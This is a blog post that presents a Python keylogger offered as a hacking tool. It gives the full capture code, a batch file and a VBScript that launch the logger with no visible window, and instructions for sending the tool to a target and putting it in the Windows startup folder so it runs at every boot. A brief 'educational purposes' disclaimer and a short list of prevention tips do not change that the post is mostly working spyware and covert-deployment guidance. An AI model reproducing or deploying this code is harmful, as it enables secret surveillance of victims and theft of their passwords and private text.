In this blog, I’ll be explaining about a keylogger that I’ve created using Python. I’ll be explaining the full Python code in details and will also show how it works and what all implementations can be done in that tool. So let’s get started.
Keyloggers are tools that hackers use to spy on their targets. Generally, it captures each and every keystroke made by the target and saves it in a file locally or sends it to the attacker.
There are generally two types of keyloggers: hardware-based keyloggers and software-based keyloggers.
Hardware keylogger: It is a hardware device that looks similar to a USB drive and sends captured keystrokes to the attacker, or even stores the captured keystrokes locally.
Software Keylogger is a malicious code written with an evil mindset to steal the target’s keystrokes; the attacker sends these malicious files to the victim via phishing or any other type of social engineering. The attacker has two options for obtaining the captured keystrokes in this case: sending them via email or storing them locally.
This blog & tool is made for Educational purpose only. Don’t use it for ILLEGAL Activities. You are responsible for your Actions.
The keylogger I’m going to discuss was created in Python, which stores all the keystrokes locally in a text file named
keylogger.txt, with proper timings of keystrokes mentioned. The attacker needs to run the
script.vbs file, which will trigger both
.py and.bat files to run the keylogger. It will then run a keylogger in the background without the knowledge of the target.
Files we need to create:
Get all the files in my GitHub repository ; this is just version 1.0.0; more updates will come soon.
Explaining the code
So, first, make a file called
keylogger.pyw. If you haven’t noticed, I used .pyw instead of.py for the python extension because .pyw files are used in Windows to indicate a script that needs to be run using pythonw.exe instead of python.exe to prevent a DOS console from popping up and displaying the output, so we can basically do and run anything on our target computer without him or her noticing it.
Now I’ll be explaining the code in parts. The full code can be found here.
The required libraries:
from pynput.keyboard import Key, Listener from datetime import datetime
To run the keylogger we need to install the above mentioned libraries. We need
pynput library to control and monitor input devices, like keyboard and mouse. Then we need to install
datetime library to give a proper date and timing to the input made by the target, and store it on a record file.
with open("keylogger.txt", "a") as f: f.write("TimeStamp"+(str(datetime.now()))[:-7]+":\n") f.write("\n")
This code opens the “keylogger.txt” file in append mode and writes a timestamp to the file. The timestamp is created using the
datetime.now function, which returns the current date and time. The timestamp is then converted to a string, and some characters are removed using string slicing. The resulting string is then written to the file, followed by a newline character.
The timestamp is being written to the file so that you can know when each keylogger logging session took place.
def on_press(key): global count, keys keys.append(key) count += 1 if count >= 5: count = 0 write_file(keys) keys =  def on_release(key): if key == Key.esc: return False
This code defines two event handlers for the
keyboard module. The
on_press function is called when a key is pressed, and the
on_release function is called when a key is released.
on_press function appends the key that was pressed to a list called
keys, increments a
count variable, and then checks if
count is greater than or equal to 5. If it is, it resets the
count to 0, calls a function called
write_file with the
keys list as an argument, and resets the
keys list to an empty list.
on_release function checks if the key that was released is the
Esc key. If it is, the function returns
False, which will stop the keyboard listener.
def write_file(keys): with open("keylogger.txt", "a") as f: for idx, key in enumerate(keys): k = str(key).replace("'", "") if k.find("space") > 0 and k.find("backspace") == -1: f.write("\n") elif k.find("Key") == -1: f.write(k)
write_file function writes the keys in the
keys list to a file called “keylogger.txt” in append mode. It iterates over the
keys list and performs some string manipulation on each key before writing it to the file.
First, it calls the
replace method on the string representation of the key and replaces any single quotes with an empty string. This is done to remove the single quotes that appear around some of the key names.
Next, it checks if the string “space” appears in the key name and the string “backspace” does not. If both of these conditions are true, it writes a newline character to the file. Otherwise, it checks if the string “Key” does not appear in the key name. If this is the case, it writes the key name to the file.
Overall, this function is used to process the keys in the
keys list and write them to the file in a specific format.
if __name__ == "__main__": with Listener( on_press=on_press, on_release=on_release) as listener: listener.join() with open("keylogger.txt", "a") as f: f.write("\n\n") f.write( "------------------------------------------------------------------------------") f.write("\n\n")
This code sets up a
Listener from the
keyboard module, which will call the
on_release event handlers when a key is pressed or released, respectively. The
join method is called on the listener to start it, and it will run until the
Esc key is pressed, at which point the
on_release event handler will return
False, stopping the listener.
After the listener has stopped, the code opens the “keylogger.txt” file in append mode and writes a newline and some dashes to the file. This is likely used as a separator between different logging sessions.
Now that the main Python file has been created, we need two more files to support it. So first we create a batch file (.bat) and then a VBScript file (.vbs).
Batch file (.bat): A batch file is a script file in DOS, OS/2, and Microsoft Windows. It consists of a series of commands to be executed by the command-line interpreter and is stored in a plain text file.
VBScript (.vbs): VBScript is an Active Scripting language developed by Microsoft that is modelled on Visual Basic.
@ECHO OFF C:\Users\.....\ # Write the address of python here. %CD%\keylogger.pyw %*
script.bat is a batch file for Windows that runs a Python script called “keylogger.pyw” from the current directory (denoted by %CD%).
@ECHO OFF command at the top of the file prevents the command from being displayed in the command prompt as it is being executed.
C:\Users\.....\ is a placeholder for the address of the Python executable on your system. You’ll need to replace
..... with the actual address of the Python executable on your computer.
%* at the end of the line is a batch file parameter that passes all of the arguments given to the batch file to the Python script.
This batch file can be run by double-clicking it or by entering script
.bat at the command prompt.
CreateObject("Wscript.Shell").Run "script.bat", 0, True
This code creates an instance of the
Wscript.Shell object and runs a batch file called “script.bat” using the
Run method. The
0 argument specifies that the script should be run in a minimized window, and the
True argument specifies that the script should be run asynchronously (meaning that the script will run in the background and the user can continue to interact with the system while the script is running).
So, now that I’ve gone over all three necessary files, how do you use them?
The use is quite simple; to run the keylogger locally, you just need to open the script.vbs file.
Now, if you are trying to send it to someone and want to record the keystrokes, you will have to follow the steps below:
- Firstly, create a shortcut of the script.vbs file.
- Cut (Ctrl + X) that shortcut file.
- Now press Win+R, which will open Run; type
shell:startupand press the Enter button.
- It will open the Startup folder.
- Now just paste that shortcut file (script.vbs) in that startup directory.
Now, whenever the target starts the system, your keylogger will automatically start and record the keystrokes.
More updates to the keylogger will come very soon, and they will include features like sending the files to the attacker and not saving locally, recording the target’s microphone, and also taking real time screenshots at a fixed time interval.
How to prevent keylogging?
- Make sure you do not download or run any unknown files.
- Do not download or run any cracked software;
it has been found that most keyloggers are present in cracked software.
- Make sure you have antivirus and a firewall installed on your system.
- Keep updating your system whenever any patches are officially released.
Don’t be safety blinded, be safely minded!!
With ♥ VirusZzWarning